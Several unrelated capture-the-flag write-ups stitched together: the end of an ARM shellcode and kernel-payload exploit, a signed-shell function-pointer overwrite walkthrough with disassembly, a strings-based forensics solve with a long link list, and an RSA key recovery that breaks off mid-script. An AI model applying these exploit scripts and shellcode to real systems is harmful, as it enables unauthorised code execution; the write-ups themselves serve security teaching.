```arm-none-eabi-as ./boot_sc.s && arm-none-eabi-objcopy -O binary a.out sc.bin``` The following few lines were added to the python exploit to send the shellcode and later the kernel payload: ```python sc = open("sc.bin", "rb").read()x.send(sc.ljust(sc_size, "\x00")) print "[*] Waiting for Done flag"x.recvuntil("D\n") print "[*] Sending kernel mode payload" '''This is the following code: str r7, [r8, 4]ldr pc, [pc, 20] to replace the syscall reset vector. This way we get an arbitrary write for each syscall we make'''sc = "047088e514f09fe5".decode("hex")x.send(sc.ljust(16, "\x00")) print "[*] Go check!" x.interactive()``` # Show time Finally, running this on the CTF server we got the following output: ```bkpctf python bare.py[+] Opening connection to 54.214.122.246 on port 8888: Done[*] Write target: 0x440064c[*] Paused (press any to continue)[*] Waiting for Done flag[*] Sending kernel mode payload[*] Go check![*] Switching to interactive modeBkP{I saw ARM on your resume...}[*] Got EOF while reading in interactive$``` And this concludes this very nice multi-stage exploiting challenge :) If you are curoius and want to try it out locally, just get the files from the challenge folder and run the server with socat as follows: ```socat TCP-LISTEN:8888,reuseaddr,fork EXEC:"./run.sh"``` Replace the IP address in the python file and run it.
<span>Secure Shell Server<span>This challenge involves getting arbitrary shell access to a secure shell server</span>Welcome to Secure Signed Shell1) sign command2) execute command>_</span><span>As always, we can start by fuzzing all the string input states of the program, we quickly find that entering more than 256 characters into the execute command prompt causes seg faults indicating a possible buffer overflow, invalid instructions, or memory corruption.</span><span>We can look at the area in memory where the command is stored, and we find it to be a global section obj.global of size 0x100 (256). In running the code, however, we notice that the null byte termination at the end of the string overwrites a value directly after the global section, specifically the byte at address 0x00602240. This byte is then used to determine whether to run a SHA1 or MD5 hashing of the command. We know it does MD5 by default due to the length of the signatures of whitelisted commands (ls, whoami, ...). We don't yet know why the segfault appears, but we do notice we can change execution by altering which path je 0x4011f2 takes</span> 0x401145 ;[ge]mov edi, str.what_command_do_you_want_to_run_ call sym.imp.puts ;[gg]mov edi, 0x401622mov eax, 0call sym.imp.printf ;[gh]mov edx, 0x100mov esi, obj.globalmov edi, 0call sym.imp.read ;[gi]mov dword [rbp - local_54h], eaxmov eax, dword [rbp - local_54h]cdqemov byte [rax + obj.global], 0mov qword [rbp - local_40h], obj.globalmovzx eax, byte [0x00602240]test al, alje 0x4011f2 ;[gj]<span>We can continue execution to determine what call causes the segfaults and we find a register call to an address stored at obj.m_exec_guy + 0x13. Depending on the overflow input the call to rax gives different results.</span>0x401369 ;[gAd]mov rax, qword [obj.m_exec_guy]mov rax, qword [rax + 0x13]mov edi, obj.globalcall raxjmp 0x40138f ;[gAc] <span>Let's quickly examine the setup for this memory location, it appears to create an obj.s_exec_guy and obj.m_exec_guy, finding usage of these pointers suggests they are for storing the SHA1 and MD5 hashes (hence s and m prefixes). Since the hashes are different lengths it makes sense obj.s_exec_guy provides more space than obj.m_exec_guy. However the address to the functions to deny_command and exec_command lie directly after the stored hash.</span>0x4010c8 ;[gd]mov esi, 1mov edi, 0x24call sym.imp.calloc ;[gc]mov qword [obj.exec_guy], raxmov rax, qword [obj.exec_guy]mov qword [obj.s_exec_guy], raxmov rax, qword [obj.exec_guy]add rax, 1mov qword [obj.m_exec_guy], rax mov rax, qword [obj.s_exec_guy] mov qword [rax + 0x14], sym.deny_command mov rax, qword [obj.s_exec_guy]mov qword [rax + 0x1c], sym.exec_command<span>Now the exploit becomes clear, by controlling the SHA1/MD5 jump we can effectively choose the length of the hash stored at the address determined at the beginning of execution. Since the program expects to perform MD5, if we change the execution to be SHA1 it will store a larger hash than expected in the obj.m_exec_guy location, thus overwriting the last (endianness) two bytes of the address sym.deny_command. Luckily the addresses for sym.deny_command and sym.exec_command differ by only two bytes, thus by hashing enough different inputs we can overwrite the deny address to jump to the exec address. Then so long as our input command is at least partially valid in shell we can execute the command and return the result.</span><span>See website for codeoutput: trying: cat flag;DEXotxgPoDkrkHpgaVubVrFGOvTOPWgreLTocJHJmZGpLeLgChPKeLCjLYDFacUyxXVcdrUqmdRPVLIAwtgKjJsRPKlmhRTCTOamDyaqTFQfRFtfNWEbpcMIfupVOzMkejNAXYhWujNGWAbMVOGfUdotGMjFOfhzLKjzoKTQXEFTCtwBqfndBvDmdWIpJOXauQitisLLouNDksWcOcISPqPenZSdsfoOHvglTqWIEjCvAbIyqpRjWHw ANSWER: bkp{and you did not even have to break sha1}</span>
Woodstock-1======== > John Hammond | Tuesday, February 7th, 2017 -------------------------------------------- > Someone intercepted a chat between illustris and codelec Another `10` point forensics challenge. [`strings`][strings] for the win, again (This challenge has a flag transmitted in the clear). ``` bash#!/bin/bash strings ws1_2.pcapng |grep -oE "BITSCTF{.*}" --color=never``` __The flag was: `BITSCTF{such_s3cure_much_w0w}`__ [netcat]: https://en.wikipedia.org/wiki/Netcat[Wikipedia]: https://www.wikipedia.org/[Linux]: https://www.linux.com/[man page]: https://en.wikipedia.org/wiki/Man_page[man pages]: https://en.wikipedia.org/wiki/Man_page[man]: https://en.wikipedia.org/wiki/Man_page[PuTTY]: http://www.putty.org/[ssh]: https://en.wikipedia.org/wiki/Secure_Shell[Windows]: http://www.microsoft.com/en-us/windows[virtual machine]: https://en.wikipedia.org/wiki/Virtual_machine[operating system]:https://en.wikipedia.org/wiki/Operating_system[OS]: https://en.wikipedia.org/wiki/Operating_system[VMWare]: http://www.vmware.com/[VirtualBox]: https://www.virtualbox.org/[hostname]: https://en.wikipedia.org/wiki/Hostname[port number]: https://en.wikipedia.org/wiki/Port_%28computer_networking%29[port]: https://en.wikipedia.org/wiki/Port_%28computer_networking%29[ports]: https://en.wikipedia.org/wiki/Port_%28computer_networking%29[distribution]:https://en.wikipedia.org/wiki/Linux_distribution[Ubuntu]: http://www.ubuntu.com/[ISO]: https://en.wikipedia.org/wiki/ISO_image[standard streams]: https://en.wikipedia.org/wiki/Standard_streams[standard output]: https://en.wikipedia.org/wiki/Standard_streams[standard input]: https://en.wikipedia.org/wiki/Standard_streams[read]: http://ss64.com/bash/read.html[variable]: https://en.wikipedia.org/wiki/Variable_%28computer_science%29[command substitution]: http://www.tldp.org/LDP/abs/html/commandsub.html[permissions]: https://en.wikipedia.org/wiki/File_system_permissions[redirection]: http://www.tldp.org/LDP/abs/html/io-redirection.html[redirect]: http://www.tldp.org/LDP/abs/html/io-redirection.html[pipe]: http://www.tldp.org/LDP/abs/html/io-redirection.html[piped]: http://www.tldp.org/LDP/abs/html/io-redirection.html[piping]: http://www.tldp.org/LDP/abs/html/io-redirection.html[tmp]: http://www.tldp.org/LDP/Linux-Filesystem-Hierarchy/html/tmp.html[curl]: http://curl.haxx.se/[cl1p.net]: https://cl1p.net/[request]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html[POST request]: https://en.wikipedia.org/wiki/POST_%28HTTP%29[Python]: http://python.org/[interpreter]: https://en.wikipedia.org/wiki/List_of_command-line_interpreters[requests]: http://docs.python-requests.org/en/latest/[urllib]: https://docs.python.org/2/library/urllib.html[file handling with Python]: https://docs.python.org/2/tutorial/inputoutput.html#reading-and-writing-files[bash]: https://www.gnu.org/software/bash/[Assembly]: https://en.wikipedia.org/wiki/Assembly_language[the stack]: https://en.wikipedia.org/wiki/Stack_%28abstract_data_type%29[register]: http://www.tutorialspoint.com/assembly_programming/assembly_registers.htm[hex]: https://en.wikipedia.org/wiki/Hexadecimal[hexadecimal]: https://en.wikipedia.org/wiki/Hexadecimal[archive file]: https://en.wikipedia.org/wiki/Archive_file[zip file]: https://en.wikipedia.org/wiki/Zip_%28file_format%29[.zip]: https://en.wikipedia.org/wiki/Zip_%28file_format%29[gigabytes]: https://en.wikipedia.org/wiki/Gigabyte[GB]: https://en.wikipedia.org/wiki/Gigabyte[GUI]: https://en.wikipedia.org/wiki/Graphical_user_interface[Wireshark]: https://www.wireshark.org/[FTP]: https://en.wikipedia.org/wiki/File_Transfer_Protocol[client and server]: https://simple.wikipedia.org/wiki/Client-server[RETR]: http://cr.yp.to/ftp/retr.html[FTP server]: https://help.ubuntu.com/lts/serverguide/ftp-server.html[SFTP]: https://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol[SSL]: https://en.wikipedia.org/wiki/Transport_Layer_Security[encryption]: https://en.wikipedia.org/wiki/Encryption[HTML]: https://en.wikipedia.org/wiki/HTML[Flask]: http://flask.pocoo.org/[SQL]: https://en.wikipedia.org/wiki/SQL[and]: https://en.wikipedia.org/wiki/Logical_conjunction[Cyberstakes]: https://cyberstakesonline.com/[cat]: https://en.wikipedia.org/wiki/Cat_%28Unix%29[symbolic link]: https://en.wikipedia.org/wiki/Symbolic_link[ln]: https://en.wikipedia.org/wiki/Ln_%28Unix%29[absolute path]: https://en.wikipedia.org/wiki/Path_%28computing%29[CTF]: https://en.wikipedia.org/wiki/Capture_the_flag#Computer_security[Cyberstakes]: https://cyberstakesonline.com/[OverTheWire]: http://overthewire.org/[Leviathan]: http://overthewire.org/wargames/leviathan/[ls]: https://en.wikipedia.org/wiki/Ls[grep]: https://en.wikipedia.org/wiki/Grep[strings]: http://linux.die.net/man/1/strings[ltrace]: http://linux.die.net/man/1/ltrace[C]: https://en.wikipedia.org/wiki/C_%28programming_language%29[strcmp]: http://linux.die.net/man/3/strcmp[access]: http://pubs.opengroup.org/onlinepubs/009695399/functions/access.html[system]: http://linux.die.net/man/3/system[real user ID]: https://en.wikipedia.org/wiki/User_identifier[effective user ID]: https://en.wikipedia.org/wiki/User_identifier[brute force]: https://en.wikipedia.org/wiki/Brute-force_attack[brute-force]: https://en.wikipedia.org/wiki/Brute-force_attack[for loop]: https://en.wikipedia.org/wiki/For_loop[bash programming]: http://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO.html[Behemoth]: http://overthewire.org/wargames/behemoth/[command line]: https://en.wikipedia.org/wiki/Command-line_interface[command-line]: https://en.wikipedia.org/wiki/Command-line_interface[cli]: https://en.wikipedia.org/wiki/Command-line_interface[PHP]: https://php.net/[URL]: https://en.wikipedia.org/wiki/Uniform_Resource_Locator[TamperData]: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/[Firefox]: https://www.mozilla.org/en-US/firefox/new/?product=firefox-3.6.8&os=osx%E2%8C%A9=en-US[Caesar Cipher]: https://en.wikipedia.org/wiki/Caesar_cipher[Google Reverse Image Search]: https://www.google.com/imghp[PicoCTF]: https://picoctf.com/[JavaScript]: https://www.javascript.com/[base64]: https://en.wikipedia.org/wiki/Base64[client-side]: https://en.wikipedia.org/wiki/Client-side_scripting[client side]: https://en.wikipedia.org/wiki/Client-side_scripting[javascript:alert]: http://www.w3schools.com/js/js_popup.asp[Java]: https://www.java.com/en/[2147483647]: https://en.wikipedia.org/wiki/2147483647_%28number%29[XOR]: https://en.wikipedia.org/wiki/Exclusive_or[XOR cipher]: https://en.wikipedia.org/wiki/XOR_cipher[quipqiup.com]: http://www.quipqiup.com/[PDF]: https://en.wikipedia.org/wiki/Portable_Document_Format[pdfimages]: http://linux.die.net/man/1/pdfimages[ampersand]: https://en.wikipedia.org/wiki/Ampersand[URL encoding]: https://en.wikipedia.org/wiki/Percent-encoding[Percent encoding]: https://en.wikipedia.org/wiki/Percent-encoding[URL-encoding]: https://en.wikipedia.org/wiki/Percent-encoding[Percent-encoding]: https://en.wikipedia.org/wiki/Percent-encoding[endianness]: https://en.wikipedia.org/wiki/Endianness[ASCII]: https://en.wikipedia.org/wiki/ASCII[struct]: https://docs.python.org/2/library/struct.html[pcap]: https://en.wikipedia.org/wiki/Pcap[packet capture]: https://en.wikipedia.org/wiki/Packet_analyzer[HTTP]: https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol[Wireshark filters]: https://wiki.wireshark.org/DisplayFilters[SSL]: https://en.wikipedia.org/wiki/Transport_Layer_Security[Assembly]: https://en.wikipedia.org/wiki/Assembly_language[Assembly Syntax]: https://en.wikipedia.org/wiki/X86_assembly_language#Syntax[Intel Syntax]: https://en.wikipedia.org/wiki/X86_assembly_language[Intel or AT&T]: http://www.imada.sdu.dk/Courses/DM18/Litteratur/IntelnATT.htm[AT&T syntax]: https://en.wikibooks.org/wiki/X86_Assembly/GAS_Syntax[GET request]: https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol#Request_methods[GET requests]: https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol#Request_methods[IP Address]: https://en.wikipedia.org/wiki/IP_address[IP Addresses]: https://en.wikipedia.org/wiki/IP_address[MAC Address]: https://en.wikipedia.org/wiki/MAC_address[session]: https://en.wikipedia.org/wiki/Session_%28computer_science%29[Cookie Manager+]: https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/[hexedit]: http://linux.die.net/man/1/hexedit[Google]: http://google.com/[Scapy]: http://www.secdev.org/projects/scapy/[ARP]: https://en.wikipedia.org/wiki/Address_Resolution_Protocol[UDP]: https://en.wikipedia.org/wiki/User_Datagram_Protocol[SQL injection]: https://en.wikipedia.org/wiki/SQL_injection[sqlmap]: http://sqlmap.org/[sqlite]: https://www.sqlite.org/[MD5]: https://en.wikipedia.org/wiki/MD5[OpenSSL]: https://www.openssl.org/[Burpsuite]:https://portswigger.net/burp/[Burpsuite.jar]:https://portswigger.net/burp/[Burp]:https://portswigger.net/burp/[NULL character]: https://en.wikipedia.org/wiki/Null_character[Format String Vulnerability]: http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf[printf]: http://pubs.opengroup.org/onlinepubs/009695399/functions/fprintf.html[argument]: https://en.wikipedia.org/wiki/Parameter_%28computer_programming%29[arguments]: https://en.wikipedia.org/wiki/Parameter_%28computer_programming%29[parameter]: https://en.wikipedia.org/wiki/Parameter_%28computer_programming%29[parameters]: https://en.wikipedia.org/wiki/Parameter_%28computer_programming%29[Vortex]: http://overthewire.org/wargames/vortex/[socket]: https://docs.python.org/2/library/socket.html[file descriptor]: https://en.wikipedia.org/wiki/File_descriptor[file descriptors]: https://en.wikipedia.org/wiki/File_descriptor[Forth]: https://en.wikipedia.org/wiki/Forth_%28programming_language%29[github]: https://github.com/[buffer overflow]: https://en.wikipedia.org/wiki/Buffer_overflow[try harder]: https://www.offensive-security.com/when-things-get-tough/[segmentation fault]: https://en.wikipedia.org/wiki/Segmentation_fault[seg fault]: https://en.wikipedia.org/wiki/Segmentation_fault[segfault]: https://en.wikipedia.org/wiki/Segmentation_fault[shellcode]: https://en.wikipedia.org/wiki/Shellcode[sploit-tools]: https://github.com/SaltwaterC/sploit-tools[Kali]: https://www.kali.org/[Kali Linux]: https://www.kali.org/[gdb]: https://www.gnu.org/software/gdb/[gdb tutorial]: http://www.unknownroad.com/rtfm/gdbtut/gdbtoc.html[payload]: https://en.wikipedia.org/wiki/Payload_%28computing%29[peda]: https://github.com/longld/peda[git]: https://git-scm.com/[home directory]: https://en.wikipedia.org/wiki/Home_directory[NOP slide]:https://en.wikipedia.org/wiki/NOP_slide[NOP]: https://en.wikipedia.org/wiki/NOP[examine]: https://sourceware.org/gdb/onlinedocs/gdb/Memory.html[stack pointer]: http://stackoverflow.com/questions/1395591/what-is-exactly-the-base-pointer-and-stack-pointer-to-what-do-they-point[little endian]: https://en.wikipedia.org/wiki/Endianness[big endian]: https://en.wikipedia.org/wiki/Endianness[endianness]: https://en.wikipedia.org/wiki/Endianness[pack]: https://docs.python.org/2/library/struct.html#struct.pack[ash]:https://en.wikipedia.org/wiki/Almquist_shell[dash]: https://en.wikipedia.org/wiki/Almquist_shell[shell]: https://en.wikipedia.org/wiki/Shell_%28computing%29[pwntools]: https://github.com/Gallopsled/pwntools[colorama]: https://pypi.python.org/pypi/colorama[objdump]: https://en.wikipedia.org/wiki/Objdump[UPX]: http://upx.sourceforge.net/[64-bit]: https://en.wikipedia.org/wiki/64-bit_computing[breakpoint]: https://en.wikipedia.org/wiki/Breakpoint[stack frame]: http://www.cs.umd.edu/class/sum2003/cmsc311/Notes/Mips/stack.html[format string]: http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html[format specifiers]: http://web.eecs.umich.edu/~bartlett/printf.html[format specifier]: http://web.eecs.umich.edu/~bartlett/printf.html[variable expansion]: https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html[base pointer]: http://stackoverflow.com/questions/1395591/what-is-exactly-the-base-pointer-and-stack-pointer-to-what-do-they-point[dmesg]: https://en.wikipedia.org/wiki/Dmesg[Android]: https://www.android.com/[.apk]:https://en.wikipedia.org/wiki/Android_application_package[decompiler]: https://en.wikipedia.org/wiki/Decompiler[decompile Java code]: http://www.javadecompilers.com/[jadx]: https://github.com/skylot/jadx[.img]: https://en.wikipedia.org/wiki/IMG_%28file_format%29[binwalk]: http://binwalk.org/[JPEG]: https://en.wikipedia.org/wiki/JPEG[JPG]: https://en.wikipedia.org/wiki/JPEG[disk image]: https://en.wikipedia.org/wiki/Disk_image[foremost]: http://foremost.sourceforge.net/[eog]: https://wiki.gnome.org/Apps/EyeOfGnome[function pointer]: https://en.wikipedia.org/wiki/Function_pointer[machine code]: https://en.wikipedia.org/wiki/Machine_code[compiled language]: https://en.wikipedia.org/wiki/Compiled_language[compiler]: https://en.wikipedia.org/wiki/Compiler[scripting language]: https://en.wikipedia.org/wiki/Scripting_language[scripts]: https://en.wikipedia.org/wiki/Scripting_language[script]: https://en.wikipedia.org/wiki/Scripting_language[shell-storm.org]: http://shell-storm.org/[shell-storm]:http://shell-storm.org/[shellcode database]: http://shell-storm.org/shellcode/[gdb-peda]: https://github.com/longld/peda[x86]: https://en.wikipedia.org/wiki/X86[Intel x86]: https://en.wikipedia.org/wiki/X86[sh]: https://en.wikipedia.org/wiki/Bourne_shell[/bin/sh]: https://en.wikipedia.org/wiki/Bourne_shell[SANS]: https://www.sans.org/[Holiday Hack Challenge]: https://holidayhackchallenge.com/[USCGA]: http://uscga.edu/[United States Coast Guard Academy]: http://uscga.edu/[US Coast Guard Academy]: http://uscga.edu/[Academy]: http://uscga.edu/[Coast Guard Academy]: http://uscga.edu/[Hackfest]: https://www.sans.org/event/pen-test-hackfest-2015[SSID]: https://en.wikipedia.org/wiki/Service_set_%28802.11_network%29[DNS]: https://en.wikipedia.org/wiki/Domain_Name_System[Python:base64]: https://docs.python.org/2/library/base64.html[OpenWRT]: https://openwrt.org/[node.js]: https://nodejs.org/en/[MongoDB]: https://www.mongodb.org/[Mongo]: https://www.mongodb.org/[SuperGnome 01]: http://52.2.229.189/[Shodan]: https://www.shodan.io/[SuperGnome 02]: http://52.34.3.80/[SuperGnome 03]: http://52.64.191.71/[SuperGnome 04]: http://52.192.152.132/[SuperGnome 05]: http://54.233.105.81/[Local file inclusion]: http://hakipedia.com/index.php/Local_File_Inclusion[LFI]: http://hakipedia.com/index.php/Local_File_Inclusion[PNG]: http://www.libpng.org/pub/png/[.png]: http://www.libpng.org/pub/png/[Remote Code Execution]: https://en.wikipedia.org/wiki/Arbitrary_code_execution[RCE]: https://en.wikipedia.org/wiki/Arbitrary_code_execution[GNU]: https://www.gnu.org/[regular expression]: https://en.wikipedia.org/wiki/Regular_expression[regular expressions]: https://en.wikipedia.org/wiki/Regular_expression[uniq]: https://en.wikipedia.org/wiki/Uniq[sort]: https://en.wikipedia.org/wiki/Sort_%28Unix%29[binary data]: https://en.wikipedia.org/wiki/Binary_data[binary]: https://en.wikipedia.org/wiki/Binary[automation is divine]: https://www.youtube.com/watch?v=36AA3JGRP9s[repos]:https://help.ubuntu.com/community/Repositories/Ubuntu[repo]:https://help.ubuntu.com/community/Repositories/Ubuntu[repository]:https://help.ubuntu.com/community/Repositories/Ubuntu[repositories]: https://help.ubuntu.com/community/Repositories/Ubuntu[hex dump]: https://en.wikipedia.org/wiki/Hex_dump[hexdump]: https://en.wikipedia.org/wiki/Hex_dump[xxd]: http://linuxcommand.org/man_pages/xxd1.html[mkdir]: https://en.wikipedia.org/wiki/Mkdir[file]: https://en.wikipedia.org/wiki/File_%28command%29[gzip]: http://www.gzip.org/[file extension]: https://en.wikipedia.org/wiki/Filename_extension[bzip]: http://www.bzip.org/[bzip2]: http://www.bzip.org/[tar]: https://en.wikipedia.org/wiki/Tar_%28computing%29[tar command]: http://linuxcommand.org/man_pages/tar1.html[private key]: https://help.ubuntu.com/community/SSH/OpenSSH/Keys[s_client]: https://www.openssl.org/docs/manmaster/apps/s_client.html[nmap]: https://nmap.org/[IP address]: https://en.wikipedia.org/wiki/IP_address[RSA]: https://en.wikipedia.org/wiki/RSA_(cryptosystem)[ssh private key]: https://help.ubuntu.com/community/SSH/OpenSSH/Keys[file permissions]: https://www.linux.com/learn/understanding-linux-file-permissions[octal file permission]: http://www.cyberciti.biz/faq/how-linux-file-permissions-work/[octal file permissions]: http://www.cyberciti.biz/faq/how-linux-file-permissions-work/[chmod]: https://en.wikipedia.org/wiki/Chmod[diff]: http://man7.org/linux/man-pages/man1/diff.1.html[.bashrc]: http://unix.stackexchange.com/questions/129143/what-is-the-purpose-of-bashrc-and-how-does-it-work[bashrc]: http://unix.stackexchange.com/questions/129143/what-is-the-purpose-of-bashrc-and-how-does-it-work[setuid]: https://en.wikipedia.org/wiki/Setuid[user id]: https://en.wikipedia.org/wiki/User_identifier[effective user id]: https://en.wikipedia.org/wiki/User_identifier#Effective_user_ID[cron]: https://en.wikipedia.org/wiki/Cron[file extension]: https://en.wikipedia.org/wiki/Filename_extension[file extensions]: https://en.wikipedia.org/wiki/Filename_extension[bash script]: https://linuxconfig.org/bash-scripting-tutorial[bash script]: https://linuxconfig.org/bash-scripting-tutorial[bash scripts]: https://linuxconfig.org/bash-scripting-tutorial[shebang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[she-bang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[sha-bang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[shabang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[sha bang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[nano]: https://en.wikipedia.org/wiki/GNU_nano[text editor]: https://en.wikipedia.org/wiki/Text_editor[whoami]: https://en.wikipedia.org/wiki/Whoami[echo]: https://en.wikipedia.org/wiki/Echo_(command)[md5sum]: http://www.tutorialspoint.com/unix_commands/md5sum.htm[checksum]: https://en.wikipedia.org/wiki/Checksum[hash]: https://en.wikipedia.org/wiki/Cryptographic_hash_function[cut]: https://en.wikipedia.org/wiki/Cut_(Unix)[daemon]: https://en.wikipedia.org/wiki/Daemon_(computing)[temporary directory]: https://en.wikipedia.org/wiki/Temporary_folder[temp directory]: https://en.wikipedia.org/wiki/Temporary_folder[temp folder]: https://en.wikipedia.org/wiki/Temporary_folder[temporary folder]: https://en.wikipedia.org/wiki/Temporary_folder[seq]: http://www.cyberciti.biz/tips/tag/seq-command[/etc/passwd]: https://en.wikipedia.org/wiki/Passwd#Password_file[more]: https://en.wikipedia.org/wiki/More_(command)[vi]: https://en.wikipedia.org/wiki/Vi[vim]: http://www.vim.org/[caesar cipher]: https://en.wikipedia.org/wiki/Caesar_cipher[vignere cipher]: https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher[substitution cipher]: https://en.wikipedia.org/wiki/Substitution_cipher[DNA]: https://en.wikipedia.org/wiki/Nucleic_acid_sequence[Python bytecode]: http://security.coverity.com/blog/2014/Nov/understanding-python-bytecode.html[uncompyle]: https://github.com/gstarnberger/uncompyle[Easy Python Decompiler]: https://github.com/aliansi/Easy-Python-Decompiler-v1.3.2[marshal]: https://docs.python.org/2/library/marshal.html[IDLE]: https://en.wikipedia.org/wiki/IDLE[bytecode]: http://whatis.techtarget.com/definition/bytecode[dis]: https://docs.python.org/2/library/dis.html[rot13]: https://en.wikipedia.org/wiki/ROT13[calendar]: https://docs.python.org/2/library/calendar.html[datetime]: https://docs.python.org/2/library/datetime.html[primefac]: https://pypi.python.org/pypi/primefac[re]: https://docs.python.org/2/library/re.html[IDA pro]: https://www.hex-rays.com/products/ida/[IDA]: https://www.hex-rays.com/products/ida/[QR Code]: https://en.wikipedia.org/wiki/QR_code[RGB]: https://en.wikipedia.org/wiki/RGB_color_model[RGB color]: https://en.wikipedia.org/wiki/RGB_color_model[exiftool]: http://www.sno.phy.queensu.ca/~phil/exiftool/[robots.txt]: http://www.robotstxt.org/[XSS]: https://en.wikipedia.org/wiki/Cross-site_scripting[cross-site scripting]: https://en.wikipedia.org/wiki/Cross-site_scripting[cross site scripting]: https://en.wikipedia.org/wiki/Cross-site_scripting[cookie catcher]: http://hackwithstyle.blogspot.com/2011/11/what-is-cookie-catcher-and-how-to-get.html[johnhammond.org]: http://johnhammond.org[HTTP cookie]: https://en.wikipedia.org/wiki/HTTP_cookie[HTTP cookies]: https://en.wikipedia.org/wiki/HTTP_cookie[cookie]: https://en.wikipedia.org/wiki/HTTP_cookie[cookies]: https://en.wikipedia.org/wiki/HTTP_cookie[HTTP GET]: http://www.w3schools.com/Tags/ref_httpmethods.asp[tee]: https://en.wikipedia.org/wiki/Tee_(command)[reverse engineering]: https://en.wikipedia.org/wiki/Reverse_engineering[cryptography]: https://en.wikipedia.org/wiki/Cryptography[crypto]: https://en.wikipedia.org/wiki/Cryptography[sed]: https://en.wikipedia.org/wiki/Sed[padding]: https://en.wikipedia.org/wiki/Padding_(cryptography)[xortool]: https://github.com/hellman/xortool[XOR Cracker]: https://wiremask.eu/tools/xor-cracker/
# CR3: What is this encryption? 150pFady assumed this time that you will be so n00b to tell what encryption he is usinghe send the following note to his friend in plain sight:```p=0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9 q=0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307 e=0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41 c=0x7fe1a4f743675d1987d25d38111fae0f78bbea6852cba5beda47db76d119a3efe24cb04b9449f53becd43b0b46e269826a983f832abb53b7a7e24a43ad15378344ed5c20f51e268186d24c76050c1e73647523bd5f91d9b6ad3e86bbf9126588b1dee21e6997372e36c3e74284734748891829665086e0dc523ed23c386bb520```He is underestimating our crypto skills! ## Recover dThis challenge requires some knowledge about basic crypto algorithms. Based on the variables that Fady sent we assumed this was RSA. A formal definition of the RSA algorithm can be expressed as the following: ![rsa](images/rsa.png) Since we know `p, q, e, c` we can easily calculate the private key `d`, luckily for us we have https://github.com/ius/rsatool that can do it for us. ```consoleλ ~/Downloads/crypto03/ ./rsatool/rsatool.py -p 0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9 -q 0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307 -e 0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41Using (p, q) to initialise RSA instance n =a22b591571af4e0d465774b82ccd9952eb479fdfdd551800c2940b1c114e25414fc62c60086563df6cba2fc164cafd0db253299dddfa57d8c4e87af9f271ef9e0cb10ab85139e5cf52ae39ff7f833380fbf3439e374c31ea26b2224b2d18cb194e3b3bb13cd6409c978e3e8ff35794ed4cf8cad0305b2b05b2ee66c09ca272ef e =6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41 d =1af78e760bba4f7b55ffffd7b9f22090a00f9ac629697fd7a971b64f81d6a3bbf6c552c3c29abe5aea07257e6fcfd2f63186da31252bbe03278732f8a4d8f7f35f8cbed38ac95f5be92aedbf093414750d11acb8a00afc9abf4d3b496d849436ef1826c27a03e362ed62f74ccc421f8c3e62d6b5967578220808b3f62b2f6c71 p =a6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9 q =fa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307``` Now we know `n` and `d`, we begin to decrypt the ciphertext `c` by creating a simple python script: ```python#!/usr/bin/env pythonimport binascii p = int('0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9', 16)q = int('0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307', 16)e = int('0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41', 16)c = 